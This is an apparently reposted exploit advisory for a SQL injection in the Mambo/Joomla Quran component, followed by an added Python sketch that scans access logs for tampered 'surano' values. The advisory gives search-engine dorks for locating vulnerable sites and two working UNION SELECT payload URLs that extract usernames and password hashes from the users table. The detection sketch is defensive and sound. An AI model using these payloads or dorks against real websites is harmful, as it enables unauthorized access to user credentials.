Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability

01 Jul 2014 00:00:00 | Reported by Root | Type: seebug | www.seebug.org | 21 Views

A SQL injection vulnerability in Mambo Component Quran version 1.1 allows unauthorized access to user credentials.

Code

+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
--found by breaker_unit and Don
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Qur'an component allows you to read and listen to the Qur'an (The Islamic Holy Book) online. A great resource for Islamic sites running on Mambo Open Source. This component was originally developed for PHP-Nuke by Syed Rasel at http://www.nzmuslim.net and then modified/ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.

Key Features:

    * Displaying the Qur'an in Arabic and its translations.
    * Enhanced with search function (using any keywords or by chapter number and verse number).
    * Arabic recitation for both listening and downloading.
    * Very user friendly.
    * Using mysql database instead of file text.

Available translations at the moment:

    * English
    * Indonesian

You can get them all at http://www.kyantonius.com.
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
allinurl:"com_quran"
inurl:"/index.php?option=com_quran"
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--

Greetz to:
balcan-crew.org
milw0rm.com
h4cky0u.biz

# milw0rm.com [2008-02-15]
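
A detection sketch for the requests shown above, added here as an example and not part of the original advisory: it flags com_quran requests in web server access logs whose surano value is not a plain number. The combined log format, the rule that a legitimate surano is a 1-3 digit chapter number, and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate surano is a chapter number (1-3 digits).
VALID_SURANO = re.compile(r"\d{1,3}")

def suspicious_surano(log_line):
    """Return the decoded surano value when a com_quran request carries
    anything other than a plain number; otherwise return None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    # parse_qs decodes %xx and '+', so encoded variants are compared decoded.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "com_quran" not in (v.lower() for v in params.get("option", [])):
        return None
    for value in params.get("surano", []):
        if not VALID_SURANO.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, client_ip, surano) for every flagged entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_surano(line)
        if value is not None:
            hits.append((n, line.split(" ", 1)[0], value))
    return hits

# Constructed sample entries (documentation IPs), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Feb/2008:10:00:01 +0000] "GET /index.php?option=com_quran&action=viewayat&surano=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Feb/2008:10:00:09 +0000] "GET /index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,2,3,4,5-- HTTP/1.1" 200 812',
    '192.0.2.10 - - [15/Feb/2008:10:00:12 +0000] "GET /index.php?option=com_content&surano=x HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The allow-list check on the decoded value catches any non-numeric surano rather than relying on SQL keyword signatures; the same integer-only rule applied in the component before the value reaches the query removes the injection point.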

                              

Vulners AI Score: 7.1 (High risk)